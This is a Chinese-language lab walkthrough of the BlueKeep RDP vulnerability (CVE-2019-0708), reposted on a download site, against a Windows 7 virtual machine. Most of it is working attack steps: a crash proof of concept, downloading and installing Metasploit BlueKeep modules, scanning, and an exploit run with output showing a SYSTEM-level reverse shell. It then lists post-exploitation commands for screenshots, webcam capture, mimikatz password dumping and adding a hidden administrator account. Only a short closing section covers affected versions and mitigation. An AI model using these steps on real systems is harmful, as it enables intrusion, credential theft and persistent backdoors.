漏洞复现:”CVE_2019_0708 BlueKeep”

漏洞复现:”CVE_2019_0708 BlueKeep”

免费

更新时间:2021-12-09

所属分类:PHP源码

评论回复:0

 

请登陆 演示地址 下载权限
环境篇 <img />技术小贴 Windows7 ultimate sp1 x64 MSF 开启远程桌面: <img /> 关闭防火墙: <img /> 利用篇 早期蓝屏 这是早期漏洞利用POC! git clone https://github.com/n1xbyte/CVE-2019-0708.git cd CVE-2019-0708 pip3 install impacket python3 crashpoc.py 192.168.173.136 32 #python3 crashpoc.py ip地址 系统类型 <img /> 注:以上POC,不需要关闭防火墙即可打穿WIN7! 获取shell 下载攻击脚本: wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 导入攻击脚本: cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb 漏洞探测: use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set rhosts 192.168.173.136 set threads 5 run [*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.173.136:3389 - The target is vulnerable. [*] 192.168.173.136:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 漏洞利用: reload_all #加载攻击脚本 search cve-2019-0708 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set rhosts 192.168.173.130 set rport 3389 set target 3 #因为我们使用的是VMware,所以可以使用target 3 exploit [*] Started reverse TCP handler on 192.168.173.1:4444 [*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.173.136:3389 - The target is vulnerable. [*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.173.136:3389 - Surfing channels ... [*] 192.168.173.136:3389 - Lobbing eggs ... [*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ... [*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800 session 1 session 1 'session' ڲⲿҲǿеij ļ C:Windowssystem32>whoami whoami nt authoritysystem #成功拿到Shell,并且为System权限 #第一次explloit导致Win7蓝屏,之后正常获取Shell target数值的说明: 根据指纹自动判断 真实机器 Virtual Box虚拟机 Vmware虚拟机 权限提升 meterpreter > getuid #获取uid meterpreter > screenshot #截图 meterpreter > webcam_scream #抓拍 meterpreter > load mimikatz #获取系统密码 meterpreter > wdigest #获取系统密码 rdesktop 192.168.173.138 #登录远程桌面 net user root$ root /add net localgroup administrators root$ /add 本次实验机器为win7,windows server 2008需要修改注册表,否则**蓝屏。 [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerWinStationsRDP-TcpfDisableCam]值修改为0 加固篇 影响版本 Windows Server 2008 (R2) Windows 7 SP1 Windows Server 2003 Windows XP 临时加固 禁止掉3389远程端口 热补丁 参考:奇安信CVE-2019-0708漏洞热补丁工具使用手册 原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/bluekeep/
下载地址
上一篇
分享海报 分享链接
下一篇
作者:莫妮莫妮
莫妮莫妮
Ta的主页 与Ta联系
Ta的投稿
Ta的文章

Powered by 深蓝资源网

Copyright © 2024 www.69shenlan.net All Rights Reserved

联系客服